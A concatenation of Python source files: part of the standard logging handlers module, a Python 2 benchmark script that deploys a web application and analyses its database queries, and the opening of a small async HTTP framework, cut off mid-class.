usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False,
errors=None):
if "b" not in mode:
encoding = io.text_encoding(encoding)
logging.FileHandler.__init__(self, filename, mode=mode,
encoding=encoding, delay=delay,
errors=errors)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
LOG_NTP = 12 # NTP subsystem
LOG_SECURITY = 13 # Log audit
LOG_CONSOLE = 14 # Log alert
LOG_SOLCRON = 15 # Scheduling daemon (Solaris)
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"console": LOG_CONSOLE,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"ntp": LOG_NTP,
"security": LOG_SECURITY,
"solaris-cron": LOG_SOLCRON,
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it not worse
# to ignore it also here.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
try:
msg = self.format(record)
if self.ident:
msg = self.ident + msg
if self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change in the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
if self.unixsocket:
try:
self.socket.send(msg)
except OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except Exception:
self.handleError(record)
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None, timeout=5.0):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
A timeout in seconds can be specified for the SMTP connection (the
default is one second).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def getConnection(self, host, secure):
"""
get a HTTP[S]Connection.
Override when a custom connection is required, for example if
there is a proxy.
"""
import http.client
if secure:
connection = http.client.HTTPSConnection(host, context=self.context)
else:
connection = http.client.HTTPConnection(host)
return connection
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import urllib.parse
host = self.host
h = self.getConnection(host, self.secure)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
# See issue #30904: putrequest call above already adds this header
# on Python 3.x.
# h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None,
flushOnClose=True):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
The ``flushOnClose`` argument is ``True`` for backward compatibility
reasons - the old behaviour is that when the handler is closed, the
buffer is flushed, even if the flush level hasn't been exceeded nor the
capacity exceeded. To prevent this, set ``flushOnClose`` to ``False``.
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
# See Issue #26559 for why this has been added
self.flushOnClose = flushOnClose
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.acquire()
try:
self.target = target
finally:
self.release()
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer.clear()
finally:
self.release()
def close(self):
"""
Flush, if appropriately configured, set the target to None and lose the
buffer.
"""
try:
if self.flushOnClose:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepare a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message and
arguments, and removes unpickleable items from the record in-place.
Specifically, it overwrites the record's `msg` and
`message` attributes with the merged message (obtained by
calling the handler's `format` method), and sets the `args`,
`exc_info` and `exc_text` attributes to None.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also returns the formatted
# message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info and exc_text attributes, as they are no longer
# needed and, if not None, will typically not be pickleable.
msg = self.format(record)
# bpo-35726: make copy of record to avoid affecting other handlers in the chain.
record = copy.copy(record)
record.message = msg
record.msg = msg
record.args = None
record.exc_info = None
record.exc_text = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self, record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
if has_task_done:
q.task_done()
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
vagrant_benchmark.py | #!/usr/bin/env python
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.append(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
import argparse
import datetime
import socket
import traceback
import time
import logging
import json
from multiprocessing import Process, Queue
from deployers import *
from drivers import *
from analyzers import *
import utils
## =====================================================================
## LOGGING CONFIGURATION
## =====================================================================
LOG = logging.getLogger()
def run_driver(driver, timeout, size, queue):
cnt = 0
start_time = time.time()
stop_time = start_time + timeout
new_driver = BenchmarkDriver(driver)
try:
while True:
cnt += new_driver.submit_actions()
if time.time() >= stop_time or get_database_size() >= size:
break
queue.put(cnt)
except Exception, e:
traceback.print_exc()
queue.put(cnt)
def get_database_size(deployer):
deployer.database = Database()
deployer.database.name = 'MySQL'
conn = deployer.get_database_connection(False)
cur = conn.cursor()
cur.execute('''
SELECT Round(SUM(data_length + index_length) / 1024 / 1024, 1)
FROM information_schema.tables
WHERE table_schema = '{}'
'''.format(deployer.database_config['name']))
size = cur.fetchone()[0]
return size
def main():
# parse args
parser = argparse.ArgumentParser()
parser.add_argument('--attempt_info', type=str)
parser.add_argument('--deploy_id', type=int)
parser.add_argument('--database', type=str)
parser.add_argument('--host', type=str)
parser.add_argument('--port', type=int)
parser.add_argument('--name', type=str)
parser.add_argument('--username', type=str)
parser.add_argument('--password', type=str)
parser.add_argument('--num_threads', type=int)
parser.add_argument('--timeout', type=int)
parser.add_argument('--size', type=int)
args = parser.parse_args()
# get args
with open(args.attempt_info, 'r') as attempt_info_file:
attempt_info = json.loads(attempt_info_file.read())
deploy_id = args.deploy_id
database_config = {
'database': args.database,
'host': args.host,
'port': args.port,
'name': args.name,
'username': args.username,
'password': args.password
}
num_threads = args.num_threads
timeout = args.timeout
size = args.size
# get deployer
project_type = attempt_info['repo_info']['project_type']
deployer_class = {
1: 'DjangoDeployer',
2: 'RoRDeployer',
3: 'NodeDeployer',
4: 'DrupalDeployer',
5: 'GrailsDeployer'
}[project_type]
moduleName = "deployers.%s" % (deployer_class.lower())
moduleHandle = __import__(moduleName, globals(), locals(), [deployer_class])
klass = getattr(moduleHandle, deployer_class)
deployer = klass(None, None, deploy_id, database_config)
result = deployer.deploy(attempt_info)
if result != 0:
deployer.kill_server()
sys.exit(-1)
LOG.info('Running driver ...')
driver = BaseDriver(deployer.get_main_url(), deployer.get_database(), deployer.deploy_id, deployer.base_path, deployer.log_file)
try:
driver.bootstrap()
driver.initialize()
except Exception, e:
traceback.print_exc()
LOG.info('Start Driving the Database ...')
actions_cnt = 0
processes = []
try:
# disable logging of requests
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
# multi-processing
queue = Queue()
for _ in range(num_threads):
process = Process(target = run_driver, args = (driver, timeout, size, queue))
processes.append(process)
process.start()
for process in processes:
process.join()
for _ in range(num_threads):
actions_cnt += queue.get()
except Exception, e:
traceback.print_exc()
LOG.info('The number of actions submitted : {}'.format(actions_cnt))
# kill server
deployer.kill_server()
# analyze
LOG.info('Analyzing queries ...')
analyzer = get_analyzer(deployer)
for form, _ in driver.forms:
analyzer.analyze_queries(form['queries'])
for url in driver.urls:
analyzer.analyze_queries(url['queries'])
LOG.info(analyzer.queries_stats)
# extract database info
LOG.info('Extracting database info ...')
analyzer.analyze_database()
LOG.info(analyzer.database_stats)
LOG.info('Database Size : {} '.format(get_database_size(deployer)))
LOG.info('Finishing ...')
if __name__ == "__main__":
main()
|
xweb.py | import asyncio
import multiprocessing
import os
import socket
import ujson as json
from email.utils import formatdate
from functools import partial
from http import HTTPStatus
import httptools
from jsonschema import Draft4Validator, ErrorTree
__version__ = '3.0.1'
class HTTPException(Exception):
def __init__(self, status, msg=None, properties=None):
self.properties = properties
self.msg = msg
self.status = status
class Request:
def __init__(self):
self.headers = {}
self.method = "HEAD"
self.url = "/"
self.raw = None
self.ip = None
def __getitem__(self, item):
return getattr(self, item)
def __setitem__(self, key, value):
setattr(self, key, value)
class Response:
def __init__(self):
self.body = ""
self.status = 200
self.msg = ""
self.headers = {
'Date': formatdate(timeval=None, localtime=False, usegmt=True),
'Content-Type': 'text/plain'
}
def __getitem__(self, item):
return getattr(self, item)
def __setitem__(self, key, value):
setattr(self, key, value)
def __bytes__(self):
http_status = HTTPStatus(self.status)
http_status_bytes = f"HTTP/1.1 {http_status.value} {http_status.phrase}".encode()
http_body_bytes = self.body.encode()
self.headers['Content-Length'] = len(http_body_bytes)
http_header_bytes = "\r\n".join([f'{k}: {v}' for k, v in self.headers.items()]).encode()
return http_status_bytes + b'\r\n' + http_header_bytes + b'\r\n\r\n' + http_body_bytes
class Context:
def __init__(self):
self.req = Request()
self.resp = Response()
self.write = None
def send(self, _):
self.write(bytes(self.resp))
def check(self, value, status=400, msg='', properties=""):
if not value:
self.abort(status=status, msg=msg, properties=properties)
def abort(self, status, msg="", properties=""):
raise HTTPException(status=status, msg=msg, properties=properties)
def __getattr__(self, item):
return getattr(self.req, item)
def __getitem__(self, item):
return getattr(self, item)
def __setitem__(self, key, value):
setattr(self, key, value)
@property
def headers(self):
return self.resp.headers
@property
def json(self):
return json.loads(self.body)
@property
def body(self):
return self.resp.body
@body.setter
def body(self, value):
